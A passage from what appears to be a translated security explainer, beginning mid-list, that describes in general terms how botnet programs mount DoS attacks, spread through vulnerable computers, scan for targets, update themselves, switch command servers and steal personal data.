BOTs disrupt an operation of a particular website by sending a numerous packet (data) to the Web server and thereby making it inoperable. As analogous to sending nuisance mails, although only small volume of attack data is sent out from a single infected computer, it would be a threat for even large scale of a server that BOTs can send out data from several thousands to several millions infected computers.

3 Network infection
Utilizing vulnerabilities of computers, BOTs take actions to augment infection so that the number of computers available for nuisance mails and DoS attacks are increased. BOTs take over computers that have vulnerabilities and send in programs for infecting other computers.


4 Network scanning
To perform the item 3 "Network infection", BOTs collect information of the computers with vulnerabilities. Using the collected information, another computer is selected as the next target for infection.

5 Self-updating the version or changing the instruction server
A BOT adds new functions and correct own flaws using functions to update itself automatically. In addition, when an "instruction server", which interfaces the instructions from the attacker, becomes unavailable due to virus disinfestation and such, the BOT find another server to switch the instruction server.


6 Spying
A BOT can send out information stored in an infected computer to the external. Therefore, based on received instructions, various pieces of information are stolen, collected or leaked out to the external, where the information includes a keyboard operation history, credit card No. and ID, password, and addresses registered in an address book of the mail software.